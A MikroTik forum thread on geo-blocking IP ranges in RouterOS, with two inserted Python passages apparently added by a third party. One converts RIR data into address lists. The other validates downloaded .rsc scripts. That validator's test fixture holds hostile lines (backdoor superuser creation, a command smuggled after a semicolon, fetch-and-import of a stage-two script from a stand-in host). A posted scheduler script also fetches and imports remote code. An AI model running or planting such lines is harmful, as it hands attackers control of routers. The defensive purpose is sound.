Community discussions

MikroTik App
 
MikeatBdnComputers
just joined
Topic Author
Posts: 4
Joined: Tue Dec 19, 2017 5:39 pm

Blocking IP's by region

Tue Dec 19, 2017 5:45 pm

Running OS v6.38, wondering if there is a way to block incoming IP's by region. We have a 3CX system that is constantly blacklisting IP's from foreign countries, and I have worked with other brands of routers that have a geological feature that allows IP's based on location, which would help in our situation, as the IP's being blacklisted by the VoIP system are all from Europe/Asia/Africa and 99.9% of the legit traffic should be from North America. Any way to block IP's based on location with my version of the OS?
 
ZeroByte
Forum Guru
Posts: 4047
Joined: Wed May 11, 2011 6:08 pm

Re: Blocking IP's by region

Tue Dec 19, 2017 5:54 pm

There's no built-in geo-reference feature in RouterOS.
You will have to use some other source of data to choose your IP ranges and either manually create an address list to your liking, or you can automate it with scripting or BGP distribution.
 
MikeatBdnComputers
just joined
Topic Author
Posts: 4
Joined: Tue Dec 19, 2017 5:39 pm

Re: Blocking IP's by region

Tue Dec 19, 2017 7:52 pm

Sounds like a bit more effort than I and the client would like to put into it. It would be more cost-efficient to replace the router with a make/model that supports that feature.
 
jarda
Forum Guru
Posts: 7756
Joined: Mon Oct 22, 2012 4:46 pm

Re: Blocking IP's by region

Tue Dec 19, 2017 8:21 pm

If it is a feature that is more important than the others, go that way. No need to push mikrotik everywhere by force...
 
arnoldmikro
newbie
Posts: 27
Joined: Sun Apr 14, 2013 5:12 pm
Location: miami fl usa

Re: Blocking IP's by region  [SOLVED]

Wed Dec 20, 2017 12:04 am

https://mikrotikconfig.com/firewall/
see if this is what you are looking for
 
MikeatBdnComputers
just joined
Topic Author
Posts: 4
Joined: Tue Dec 19, 2017 5:39 pm

Re: Blocking IP's by region

Wed Dec 20, 2017 4:36 pm

thanks arnoldmikro, this looks like something that I will use!
 
ZeroByte
Forum Guru
Posts: 4047
Joined: Wed May 11, 2011 6:08 pm

Re: Blocking IP's by region

Thu Dec 21, 2017 2:07 am

Pretty cool link. The firewall syntax they use shows this was designed for a bit older revs of RouterOS, but it will work just fine in modern revs as well. You may also want to cross-check the address lists generated against some other sites with similar lists, because this can change from time to time.

I don't recall whether the IP > Firewall > Raw functionality was introduced by version 6.38 or not - but if it is in your system, you may want to replace the drop rules in the filter with drop rules in RAW (which also prevents blocked hosts from consuming resources in state tracking)

e.g.:
/ip firewall raw add chain=prerouting action=drop src-address-list=CountryIPBlocks
/ip firewall raw add chain=prerouting action=drop dst-address-list=CountryIPBlocks
/ip firewall raw add chain=output action=drop dst-address-list=CountryIPBlocks
 
samoring
just joined
Posts: 7
Joined: Sat Jan 18, 2020 8:24 pm

Re: Blocking IP's by region

Mon Jan 27, 2020 4:26 pm

ZeroByte wrote:
Pretty cool link. The firewall syntax they use shows this was designed for a bit older revs of RouterOS, but it will work just fine in modern revs as well. You may also want to cross-check the address lists generated against some other sites with similar lists, because this can change from time to time.

I don't recall whether the IP > Firewall > Raw functionality was introduced by version 6.38 or not - but if it is in your system, you may want to replace the drop rules in the filter with drop rules in RAW (which also prevents blocked hosts from consuming resources in state tracking)

e.g.:
/ip firewall raw add chain=prerouting action=drop src-address-list=CountryIPBlocks
/ip firewall raw add chain=prerouting action=drop dst-address-list=CountryIPBlocks
/ip firewall raw add chain=output action=drop dst-address-list=CountryIPBlocks
Is there a way to permit only the dst-address-list=CountryIPBlocks? What I'd like to do is add my "good guys" to CountryIPBlocks, drop all the bad guys, then permit only the good guys.
 
mmmmarcel
just joined
Posts: 1
Joined: Thu May 02, 2019 3:01 pm

Re: Blocking IP's by region

Wed Feb 19, 2020 7:54 pm

How performant is this solution? I'm running an RBM33G here, and for Germany alone the website generates nearly 10,000 entries. Big impact on routing performance?
 
JAza
newbie
Posts: 34
Joined: Sun Jun 10, 2012 1:07 am

Re: Blocking IP's by region

Fri Jul 02, 2021 12:06 am

samoring wrote:
Pretty cool link. The firewall syntax they use shows this was designed for a bit older revs of RouterOS, but it will work just fine in modern revs as well. You may also want to cross-check the address lists generated against some other sites with similar lists, because this can change from time to time.

I don't recall whether the IP > Firewall > Raw functionality was introduced by version 6.38 or not - but if it is in your system, you may want to replace the drop rules in the filter with drop rules in RAW (which also prevents blocked hosts from consuming resources in state tracking)

e.g.:
/ip firewall raw add chain=prerouting action=drop src-address-list=CountryIPBlocks
/ip firewall raw add chain=prerouting action=drop dst-address-list=CountryIPBlocks
/ip firewall raw add chain=output action=drop dst-address-list=CountryIPBlocks
Is there a way to permit only the dst-address-list=CountryIPBlocks? What I'd like to do is add my "good guys" to CountryIPBlocks, drop all the bad guys, then permit only the good guys.


This is what seems to be working for me right now:
/ip firewall raw
add action=accept chain=prerouting src-address-list=CountryIPBlocksToAllowToAllow comment="allow inbound from whitelisted countries"
add action=accept chain=prerouting dst-address-list=CountryIPBlocksToAllowToAllow comment="allow traffic towards whitelisted countries"
add action=accept chain=output dst-address-list=CountryIPBlocksToAllowToAllow disabled=yes comment="router-originated traffic to whitelisted countries (disabled)"
add action=drop chain=prerouting comment="Prerouting DENY ALL" log=yes log-prefix="dropped by geo IP blocked ranges"
add action=drop chain=output comment="Output DENY ALL" log=yes log-prefix="dropped by geo IP blocked ranges"

Basically flip the "drop" in the above 3 rules into an "accept", then add 2 more rules after them: a prerouting-chain rule and an output-chain rule with no conditions, so they function as a basic "deny all". (These must therefore be the bottom 2 rules in the RAW table.)


EDIT to add:
Make sure to add your local LAN IP ranges to the whitelist or you will break any hairpin NATs. My solution was two bespoke rules just for the LAN address list, so it looks like this now:
/ip firewall raw
add action=accept chain=prerouting src-address-list=Local comment="LAN sources (keeps hairpin NAT working)"
add action=accept chain=output dst-address-list=Local comment="router-originated traffic to the LAN"
add action=accept chain=prerouting src-address-list=CountryIPBlocksToAllowToAllow comment="allow inbound from whitelisted countries"
add action=accept chain=prerouting dst-address-list=CountryIPBlocksToAllowToAllow comment="allow traffic towards whitelisted countries"
add action=accept chain=output src-address-list=CountryIPBlocksToAllowToAllow disabled=yes comment="(disabled)"
add action=accept chain=output dst-address-list=CountryIPBlocksToAllowToAllow comment="router-originated traffic to whitelisted countries"
add action=drop chain=prerouting comment="Prerouting DENY ALL" log=yes log-prefix="dropped by geo IP blocked ranges"
add action=drop chain=output comment="Output DENY ALL" log=yes log-prefix="dropped by geo IP blocked ranges"
 
tlaguz
just joined
Posts: 7
Joined: Fri Jul 19, 2019 3:31 pm

Re: Blocking IP's by region

Sat Mar 05, 2022 6:28 pm

arnoldmikro wrote:
https://mikrotikconfig.com/firewall/
see if this is what you are looking for
Please do not use this website! It's not updated properly.
An up-to-date list of allocations can be downloaded directly from RIPE: http://www.unix-master.com/2013/08/get- ... untry.html
 
holvoetn
Forum Guru
Posts: 5317
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Blocking IP's by region

Sat Mar 05, 2022 7:33 pm

And info from 2013 is accurate?
 
404Network
Member Candidate
Posts: 285
Joined: Wed Feb 16, 2022 2:04 pm

Re: Blocking IP's by region

Sat Mar 05, 2022 7:53 pm

Without any knowledge of the source of the information or how current it is, it's basically useless.
Also, bots can be set up to be from any country, so country blocking is a fallacy to begin with.
All these extra tools eat up CPU and complicate the config so that any issues are hard to find, and in 99% of cases having a drop-all rule at the end of the input chain and forward chain suffices for the homeowner.
If one is a business, then one may have
a. an edge router in front of the MT
b. a business-class ISP connection where the ISP may guarantee uptimes and protections
c. the MT router is not designed for DDoS attacks and the like.

Also, a business can pay for services for those edge routers etc.
There are some services available for the MT that are more specific to known bad actors regardless of country and thus more accurate, efficient and up to date.
ex1 - https://axiomcyber.com/mikrotik-support/
ex2 - https://itexpertoncall.com/promotional/ ... l_nat.html (most cost-effective solution for you or your clients IMHO)
 
tlaguz
just joined
Posts: 7
Joined: Fri Jul 19, 2019 3:31 pm

Re: Blocking IP's by region

Sun Mar 06, 2022 1:09 am

holvoetn wrote:
And info from 2013 is accurate?
I don't see how the info I posted is inaccurate. It contains a bash snippet which downloads current allocations directly from RIPE's FTP. It builds the download URL using the current system date.
You can check RIPE's FTP contents using this HTTP mirror: https://ftp.ripe.net/pub/stats/ripencc/ . As you can see, it's being regularly updated.

I spotted the problem as I got an allocation from RIPE in 2021 which was previously allocated to the Russian Federation. Recently a few of my clients decided to block Russian IPs and used free tools, like the one quoted above, to obtain Russian allocations. Most of these tools return my IP block as being allocated to Russia.

I agree that this kind of block is probably useless, but people are implementing it. The link I provided shows them how to properly obtain IP assignment data.
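As an added example (my code, not tlaguz's bash snippet, not anything from mikrotikconfig.com, and not part of any post in this thread), this is the same idea in Python: read a RIR delegated-extended file, keep only the allocated/assigned records for one country, expand each IPv4 start/count pair into CIDR prefixes, and emit a RouterOS address-list script that you generated yourself end to end. The directory is the one linked above; the exact file name in DELEGATED_URL, the "XX-geo" list name and every record in SAMPLE_DELEGATED are assumptions or constructed (documentation and benchmark ranges only, no real allocations).

```python
import ipaddress
from typing import Iterator, List, Tuple, Union

# Where the authoritative data lives. The directory is the one linked in the
# thread; the "-latest" file name is an assumption. Fetch it yourself and
# pass the text to to_routeros_rsc(); nothing here touches the network.
DELEGATED_URL = "https://ftp.ripe.net/pub/stats/ripencc/delegated-ripencc-extended-latest"

# Constructed sample in the RIR "delegated-*-extended" format
# (registry|cc|type|start|value|date|status[|opaque-id]). Every record is
# invented for this example; the prefixes are documentation/benchmark space.
SAMPLE_DELEGATED = """\
2|ripencc|20240101|4|19830705|20231231|+0100
# comment lines, the version header and the summary lines must be skipped
ripencc|*|ipv4|*|4|summary
ripencc|*|ipv6|*|1|summary
ripencc|XX|ipv4|192.0.2.0|256|20100101|allocated|abc
ripencc|XX|ipv4|198.51.100.0|768|20110101|assigned|def
ripencc|YY|ipv4|203.0.113.0|256|20120101|allocated|ghi
ripencc|XX|ipv4|198.18.0.0|32768|20100101|reserved|
ripencc|XX|ipv6|2001:db8::|32|20100101|allocated|abc
ripencc|XX|asn|64496|1|20100101|allocated|abc
"""

# Only these statuses mean the space is in use by a network in that country;
# "reserved" and "available" blocks are still held by the RIR itself.
IN_USE = {"allocated", "assigned"}

Network = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]


def parse_delegated(text: str) -> Iterator[Tuple[str, Network]]:
    """Yield (country_code, network) for every IPv4/IPv6 record that is in use.

    An IPv4 record carries an address *count*, which need not be a power of
    two, so one record may expand to several CIDR prefixes. An IPv6 record
    carries a prefix length and maps to exactly one network. ASN records
    are not addresses and are skipped.
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line[0].isdigit():
            continue                                    # comment or version header
        fields = line.split("|")
        if len(fields) < 7 or fields[1] == "*":
            continue                                    # summary line
        _registry, cc, family, start, value, _date, status = fields[:7]
        if status not in IN_USE:
            continue
        if family == "ipv4":
            first = ipaddress.IPv4Address(start)
            last = first + (int(value) - 1)
            for net in ipaddress.summarize_address_range(first, last):
                yield cc, net
        elif family == "ipv6":
            yield cc, ipaddress.IPv6Network(f"{start}/{value}")


def country_prefixes(text: str, cc: str) -> List[str]:
    """All CIDR prefixes registered to one ISO country code, in file order."""
    cc = cc.upper()
    return [str(net) for rec_cc, net in parse_delegated(text) if rec_cc == cc]


def to_routeros_rsc(text: str, cc: str, list_name: str) -> str:
    """Render a RouterOS script that rebuilds one address list from RIR data.

    The output contains nothing but address-list commands for `list_name`,
    which is the point of generating it yourself instead of importing a
    third party's .rsc: there is no room for any other instruction.
    """
    if not all(ch.isalnum() or ch in "-_" for ch in list_name):
        raise ValueError("list name must be alphanumeric, '-' or '_'")
    prefixes = country_prefixes(text, cc)
    tag = f'comment="rir {cc.upper()}"'
    lines = [f"/ip firewall address-list remove [find list={list_name}]"]
    lines += [f"/ip firewall address-list add list={list_name} address={p} {tag}"
              for p in prefixes if ":" not in p]
    lines.append(f"/ipv6 firewall address-list remove [find list={list_name}]")
    lines += [f"/ipv6 firewall address-list add list={list_name} address={p} {tag}"
              for p in prefixes if ":" in p]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(to_routeros_rsc(SAMPLE_DELEGATED, "XX", "XX-geo"), end="")
```

Feed it the real file (download DELEGATED_URL to disk and pass its contents) and copy the resulting .rsc to the router yourself. Every RIR publishes the same format, so for North American space you would read ARIN's delegated file the same way. Counts such as 768 are common in the IPv4 records, which is why a single line can become more than one prefix, and why the expansion must not assume a power of two.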
 
Znevna
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Blocking IP's by region

Sun Mar 06, 2022 11:48 pm

404Network wrote:
Without any knowledge of the source of the information or how current it is, it's basically useless.
So a solution that pulls data from RIPE is useless, and those two websites which provide paid services with NO source cited are the proper solution?
 
404Network
Member Candidate
Posts: 285
Joined: Wed Feb 16, 2022 2:04 pm

Re: Blocking IP's by region

Sun Mar 06, 2022 11:54 pm

Znevna wrote:
Without any knowledge of the source of the information or how current it is, it's basically useless.
So a solution that pulls data from RIPE is useless, and those two websites which provide paid services with NO source cited are the proper solution?
No, I said the proper solution is a business ISP account, with or without an edge router, such that the MT is not involved in such processes.
For the homeowner either of the two services is probably overkill but effective; in particular the second link is not all that expensive and does all the legwork.
As far as RIPE goes, I couldn't care less about it. Blocking by country without any other intelligence involved is just a waste of time.
 
savage
Forum Guru
Posts: 1262
Joined: Mon Oct 18, 2004 12:07 am
Location: Cape Town, South Africa

Re: Blocking IP's by region

Fri Mar 11, 2022 10:56 am

tlaguz wrote:
I don't see how the info I posted is inaccurate. It contains a bash snippet which downloads current allocations directly from RIPE's FTP. It builds the download URL using the current system date.
You can check RIPE's FTP contents using this HTTP mirror: https://ftp.ripe.net/pub/stats/ripencc/ . As you can see, it's being regularly updated.
It's as accurate as it's going to get. That data (not only from RIPE, but from all the regional RIRs) is used for RPKI as well, for example. Yes, they make mistakes sometimes, it happens, but they are the 'authoritative' supplier, as well as maintainer, of this data. There are a LOT of things that depend on this information being accurate (incl. GeoIP databases).

tlaguz wrote:
I spotted the problem as I got an allocation from RIPE in 2021 which was previously allocated to the Russian Federation. Recently a few of my clients decided to block Russian IPs and used free tools, like the one quoted above, to obtain Russian allocations. Most of these tools return my IP block as being allocated to Russia.
Then, as the custodian of that IP space / ASN, you should be contacting the RIR to correct that. In fact, RIPE has one of the best management web sites that I've seen in a long time relating to IP resources. Chances are you more than likely could have fixed it yourself too. In fact, I know for a fact that RIPE's database does have a "Country" attribute that can be used on an INET / INET6 object to specifically indicate in which country the IP range is used...

Our prefixes were mistakenly listed in Team Cymru's bogon lists a few years ago due to a f-up that our local RIR did in these databases. Took me 1 email and 30 minutes, and the entire issue was resolved globally.
 
vinu
newbie
Posts: 42
Joined: Sun Mar 05, 2017 8:09 pm
Location: India

Re: Blocking IP's by region

Fri Mar 11, 2022 5:25 pm

holvoetn wrote:
And info from 2013 is accurate?
hi,
use this
https://www.ip2location.com/free/visitor-blocker
 
tlaguz
just joined
Posts: 7
Joined: Fri Jul 19, 2019 3:31 pm

Re: Blocking IP's by region

Thu Apr 28, 2022 11:48 am

savage wrote:
Then, as the custodian of that IP space / ASN, you should be contacting the RIR to correct that. In fact, RIPE has one of the best management web sites that I've seen in a long time relating to IP resources. Chances are you more than likely could have fixed it yourself too. In fact, I know for a fact that RIPE's database does have a "Country" attribute that can be used on an INET / INET6 object to specifically indicate in which country the IP range is used...

Our prefixes were mistakenly listed in Team Cymru's bogon lists a few years ago due to a f-up that our local RIR did in these databases. Took me 1 email and 30 minutes, and the entire issue was resolved globally.
The problem was not in RIPE's DB, but in mikrotikconfig.com. I had the proper "Country" attribute set since I got the allocation. Other sites like ipinfo or various whois websites reported the proper country. I mailed ISP Supplies several times and got no response. My prefix however disappeared from the Russian list, so they either updated their lists or removed it manually. I suspect the latter, because now my prefix is absent entirely from their lists.
 
nordscan
just joined
Posts: 4
Joined: Thu May 14, 2020 2:13 pm

Re: Blocking IP's by region

Wed Jan 24, 2024 1:04 am

Script to download the current country IP list.
Change "UK" to your country code.

/system scheduler
add interval=1d name="address_lists_UK" on-event=\
"/tool fetch url=\"http://www.iwik.org/ipcountry/mikrotik/UK\" dst-path=\"UK.rsc\"\r\
\n/delay 10\r\
\n/import file-name=\"UK.rsc\"" policy=read,write,test start-time=startup

credits to https://mrnonaki.net/mikrotik-free-coun ... 654eb659c9
 
rextended
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: Blocking IP's by region

Wed Jan 24, 2024 3:19 pm

nordscan wrote:
Script to download the current country IP list.
[...]
💀⚠️CRITICAL: Never trust anyone who provides scripts containing "/import" from "/tool fetch" from external sources.
viewtopic.php?t=203733#p1051321
 
holvoetn
Forum Guru
Posts: 5317
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Blocking IP's by region

Wed Jan 24, 2024 3:30 pm

Downloaded that file; it looks pretty innocent as it is now, but your remark is very valid.
Anyone controlling that site (or someone gaining control over that place) can put other stuff in that script, and then the damage is done.

EDIT:
script as it is now:
/log info "Loading UK ipv4 address list"
/ip firewall address-list remove [/ip firewall address-list find list=UK]
/ip firewall address-list
/log info "Loading UK ipv6 address list"
/ipv6 firewall address-list remove [/ipv6 firewall address-list find list=UK]
/ipv6 firewall address-list
Doesn't do a lot! Which makes me wonder what the real intention is later on???

For giggles I also downloaded the BE script; it looks valid to me (simply adding a bunch of IPv4 and IPv6 addresses into an address list).
 
rextended
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: Blocking IP's by region

Wed Jan 24, 2024 3:38 pm

Precisely...
Trusting something like that is foolish...

Nothing forbids adding to the .rsc instructions on how to bypass the firewall, create a new superuser, do whatever you want with that device...

Let's pretend I create the list,
mischievously I start providing it for free for months,
there are even those who start using it without even asking for permission,
at a certain point, when the base is large enough, I corrupt everything with the instructions I want and ask for a ransom to unlock the machines...
or use them as a botnet to carry out cyber attacks...
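Given rextended's point, here is the check a practitioner would run on such a file before letting "/import" anywhere near it, as an added example (my code, not from the thread and not from any site mentioned in it): treat the fetched .rsc as data and accept nothing that is not an address-list command for the expected list. The grammar in the regexes is my assumption about what a legitimate list script contains; the benign input copies the layout holvoetn pasted above with a few entries added, and the hostile one is constructed, using documentation prefixes and an invented hostname.

```python
import ipaddress
import re
from typing import List, Tuple

# Grammar of a script that does nothing except rebuild one address list.
# Every pattern is used with fullmatch, so a trailing ";", a second command
# on the same line, or RouterOS expansion characters ($, [, ]) in a value
# can never pass. These patterns are my assumptions about what such a file
# should legitimately contain.
_SAFE = r'[A-Za-z0-9 ._:/-]*'
_LIST = r'[A-Za-z0-9_-]+'
_CONTEXT = re.compile(r'/(ip|ipv6) firewall address-list')
_LOG = re.compile(rf'/log info "{_SAFE}"')
_REMOVE = re.compile(rf'/(ip|ipv6) firewall address-list remove '
                     rf'\[/(ip|ipv6) firewall address-list find list=({_LIST})\]')
_KV = rf'(?:address|list|comment)=(?:"{_SAFE}"|[A-Za-z0-9._:/-]+)'
_ADD = re.compile(rf'add(?: {_KV})+')
_KV_SPLIT = re.compile(r'(address|list|comment)=("[^"]*"|\S+)')

# Constructed benign file: the layout of the UK script pasted above plus a
# few entries (documentation prefixes, not real UK space).
BENIGN_RSC = """\
/log info "Loading UK ipv4 address list"
/ip firewall address-list remove [/ip firewall address-list find list=UK]
/ip firewall address-list
add address=192.0.2.0/24 list=UK
add list=UK address=198.51.100.0/24 comment="rir UK"
/log info "Loading UK ipv6 address list"
/ipv6 firewall address-list remove [/ipv6 firewall address-list find list=UK]
/ipv6 firewall address-list
add address=2001:db8::/32 list=UK
"""

# Constructed hostile file: same header, then the kind of payload rextended
# describes, plus two subtler lines (wrong address family for the context,
# and a command smuggled inside a comment value).
HOSTILE_RSC = """\
/log info "Loading UK ipv4 address list"
/ip firewall address-list remove [/ip firewall address-list find list=UK]
/ip firewall address-list
add address=192.0.2.0/24 list=UK
add address=198.51.100.0/24 list=UK; /user add name=svc password=x group=full
/user add name=support group=full password=letmein
/tool fetch url="http://example.invalid/stage2.rsc" dst-path=stage2.rsc
/import file-name=stage2.rsc
add address=2001:db8::/32 list=UK
add address=203.0.113.0/24 list=UK comment="[/user add name=x group=full]"
"""


def validate_address_list_rsc(text: str, list_name: str) -> List[Tuple[int, str]]:
    """Return (line_number, reason) for every line that is not a plain
    address-list rebuild of `list_name`. An empty result means importing
    the file gives its author no capability beyond filling that list."""
    problems: List[Tuple[int, str]] = []
    family = None            # 4 or 6, set by the "/ip ..." / "/ipv6 ..." context line
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _CONTEXT.fullmatch(line)
        if m:
            family = 4 if m.group(1) == "ip" else 6
            continue
        if _LOG.fullmatch(line):
            continue
        m = _REMOVE.fullmatch(line)
        if m:
            if m.group(1) != m.group(2) or m.group(3) != list_name:
                problems.append((no, "remove targets another list"))
            continue
        if _ADD.fullmatch(line):
            kv = {k: v.strip('"') for k, v in _KV_SPLIT.findall(line)}
            if kv.get("list") != list_name:
                problems.append((no, "entry for another list"))
            elif family is None:
                problems.append((no, "add before an address-list context line"))
            else:
                try:
                    net = ipaddress.ip_network(kv.get("address", ""), strict=False)
                except ValueError:
                    problems.append((no, "unparsable address"))
                else:
                    if net.version != family:
                        problems.append((no, "address family does not match context"))
            continue
        problems.append((no, "command not allowed in an address-list script"))
    return problems


if __name__ == "__main__":
    for name, text in (("benign", BENIGN_RSC), ("hostile", HOSTILE_RSC)):
        print(name, validate_address_list_rsc(text, "UK") or "OK")
```

Do the fetch yourself, run the validator on the file, and only then "/import" it; if the validator returns anything, the file gets no import. The family check matters because an IPv6 entry under the "/ip" context would fail at import time and leave the list half-built, and the comment rule matters because a value containing "$", "[" or ";" has no business in an address-list comment, so the grammar rejects it rather than reasoning about what the RouterOS parser would do with it.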
